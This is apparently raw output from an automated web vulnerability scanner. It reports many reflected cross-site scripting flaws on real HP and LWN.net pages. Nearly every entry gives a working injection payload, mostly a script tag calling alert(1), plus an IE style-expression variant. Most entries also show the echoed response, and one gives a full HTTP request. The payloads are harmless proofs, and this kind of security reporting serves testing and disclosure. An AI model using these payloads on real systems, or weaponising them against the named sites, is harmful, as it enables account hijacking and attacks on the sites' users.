<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/dragdrop.jsbd15a"><script>alert(1)</script>a3a4eb3735f?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e9cc"><script>alert(1)</script>64d1b4e31c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources6e9cc"><script>alert(1)</script>64d1b4e31c2/scripts/effects.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31e71"><script>alert(1)</script>a466e2d5896 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts31e71"><script>alert(1)</script>a466e2d5896/effects.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 515ba"><script>alert(1)</script>8c0eede2f57 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/effects.js515ba"><script>alert(1)</script>8c0eede2f57?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c727"><script>alert(1)</script>83474b9d897 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources8c727"><script>alert(1)</script>83474b9d897/scripts/powered_utils.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37d5c"><script>alert(1)</script>d1b7c146211 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts37d5c"><script>alert(1)</script>d1b7c146211/powered_utils.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 727af"><script>alert(1)</script>fc4b8abf13a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/powered_utils.js727af"><script>alert(1)</script>fc4b8abf13a?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0614"><script>alert(1)</script>cb5479040c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resourcesa0614"><script>alert(1)</script>cb5479040c2/scripts/prototype.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f724"><script>alert(1)</script>4700926501a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts1f724"><script>alert(1)</script>4700926501a/prototype.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fbb7"><script>alert(1)</script>b36781bc679 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/prototype.js1fbb7"><script>alert(1)</script>b36781bc679?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ef85"><script>alert(1)</script>e6810596064 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources2ef85"><script>alert(1)</script>e6810596064/scripts/scriptaculous.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0912"><script>alert(1)</script>9ac4d4ffdf2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsa0912"><script>alert(1)</script>9ac4d4ffdf2/scriptaculous.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fd3e"><script>alert(1)</script>922b4e83789 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/scriptaculous.js8fd3e"><script>alert(1)</script>922b4e83789?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40ecd"><script>alert(1)</script>f7e231bf138 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources40ecd"><script>alert(1)</script>f7e231bf138/scripts/slider.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f565d"><script>alert(1)</script>1b065f7549d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsf565d"><script>alert(1)</script>1b065f7549d/slider.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24576"><script>alert(1)</script>64b6d3570f3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/slider.js24576"><script>alert(1)</script>64b6d3570f3?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d87a9"><script>alert(1)</script>b864179465a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resourcesd87a9"><script>alert(1)</script>b864179465a/scripts/sound.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cebe6"><script>alert(1)</script>cd545bc9316 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scriptscebe6"><script>alert(1)</script>cd545bc9316/sound.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c26bb"><script>alert(1)</script>16e93b14366 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/sound.jsc26bb"><script>alert(1)</script>16e93b14366?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d07e"><script>alert(1)</script>8207582cd96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources6d07e"><script>alert(1)</script>8207582cd96/scripts/swfobject.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3359"><script>alert(1)</script>57b0543e217 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsf3359"><script>alert(1)</script>57b0543e217/swfobject.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2495"><script>alert(1)</script>35a8d132f3c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/swfobject.jsa2495"><script>alert(1)</script>35a8d132f3c?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cf1a"><script>alert(1)</script>3392b3ceb5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources4cf1a"><script>alert(1)</script>3392b3ceb5/scripts/widget/loader.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe8e0"><script>alert(1)</script>3f3ede39727 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsfe8e0"><script>alert(1)</script>3f3ede39727/widget/loader.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e19f"><script>alert(1)</script>526b6f59145 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/widget9e19f"><script>alert(1)</script>526b6f59145/loader.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b7e7"><script>alert(1)</script>29741d37646 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/widget/loader.js1b7e7"><script>alert(1)</script>29741d37646?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b659"><script>alert(1)</script>a61331b47f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources8b659"><script>alert(1)</script>a61331b47f9/scripts/widget/util.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f05c4"><script>alert(1)</script>cb74612d597 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsf05c4"><script>alert(1)</script>cb74612d597/widget/util.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbf2f"><script>alert(1)</script>11b0cdd28a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/widgetbbf2f"><script>alert(1)</script>11b0cdd28a4/util.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6a40"><script>alert(1)</script>35a035cec2e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/widget/util.jsb6a40"><script>alert(1)</script>35a035cec2e?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a135e"><script>alert(1)</script>2f39e748c96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resourcesa135e"><script>alert(1)</script>2f39e748c96/stylesheets/site.jsp?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbc38"><script>alert(1)</script>22bac2c020c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/stylesheetsdbc38"><script>alert(1)</script>22bac2c020c/site.jsp?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5152e"><script>alert(1)</script>7a5ede59c82 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/stylesheets/site.jsp5152e"><script>alert(1)</script>7a5ede59c82?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of the jumpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 313d2"%20style%3dx%3aexpression(alert(1))%20bdc6c99b05a was submitted in the jumpid parameter. This input was echoed as 313d2\" style=x:expression(alert(1)) bdc6c99b05a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /inflexion/?country=US&language=US&campaigncode=inflexion&jumpid=inflexion313d2"%20style%3dx%3aexpression(alert(1))%20bdc6c99b05a&k_clickid=AMS|200d2a28-23e9-a048-8372-00005235d564 HTTP/1.1 Host: h41183.www4.hp.com Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 8bc34<script>alert(1)</script>efd39a0477d was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cf79"><script>alert(1)</script>dd792ac85a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Mon, 05 Sep 2011 01:55:09 GMT Server: Apache Expires: -1 Content-Length: 4300 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>404 - Not Found [LWN.net]</title> <meta HTTP- ...[SNIP]... <a href="/Articles2cf79"><script>alert(1)</script>dd792ac85a2/456878/?format=printable" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload badde"><script>alert(1)</script>19cf5213da2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Mon, 05 Sep 2011 01:55:12 GMT Server: Apache Expires: -1 Content-Length: 4300 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>404 - Not Found [LWN.net]</title> <meta HTTP- ...[SNIP]... <a href="/Articles/456878badde"><script>alert(1)</script>19cf5213da2/?format=printable" rel="nofollow"> ...[SNIP]...
3.99. http://lwn.net/Articles/456878/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://lwn.net
Path: /Articles/456878/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11f55"><script>alert(1)</script>2fc14d4e749 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>Red Hat alert RHSA-2011:1220-01 (samba3x) [LWN.net]</ ...[SNIP]... <a href="/Articles/456878/?11f55"><script>alert(1)</script>2fc14d4e749=1?format=printable" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bb31"><script>alert(1)</script>b977975e439 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Mon, 05 Sep 2011 01:55:53 GMT Server: Apache Expires: -1 Content-Length: 4338 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>404 - Not Found [LWN.net]</title> <meta HTTP- ...[SNIP]... <a href="/articles7bb31"><script>alert(1)</script>b977975e439/456878/%22onmouseover=prompt(%22E-mail%22)%3E?format=printable" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c8fd"><script>alert(1)</script>35c56d0c976 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Mon, 05 Sep 2011 01:55:56 GMT Server: Apache Expires: -1 Content-Length: 4338 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>404 - Not Found [LWN.net]</title> <meta HTTP- ...[SNIP]... <a href="/articles/4568781c8fd"><script>alert(1)</script>35c56d0c976/%22onmouseover=prompt(%22E-mail%22)%3E?format=printable" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8cab"><script>alert(1)</script>8b9a2d74c08 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Mon, 05 Sep 2011 01:55:58 GMT Server: Apache Expires: -1 Content-Length: 4338 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>404 - Not Found [LWN.net]</title> <meta HTTP- ...[SNIP]... <a href="/articles/456878/%22onmouseoverd8cab"><script>alert(1)</script>8b9a2d74c08=prompt(%22E-mail%22)%3E?format=printable" rel="nofollow"> ...[SNIP]...
The value of the format request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ec0c"><script>alert(1)</script>2fce89b00d5 was submitted in the format parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Mon, 05 Sep 2011 01:56:03 GMT Server: Apache Expires: -1 Content-Length: 4355 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>404 - Not Found [LWN.net]</title> <meta HTTP- ...[SNIP]... <a href="/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E?format=printable2ec0c"><script>alert(1)</script>2fce89b00d5?format=printable" rel="nofollow"> ...[SNIP]...
3.104. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81aab"><script>alert(1)</script>691fb0a816a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
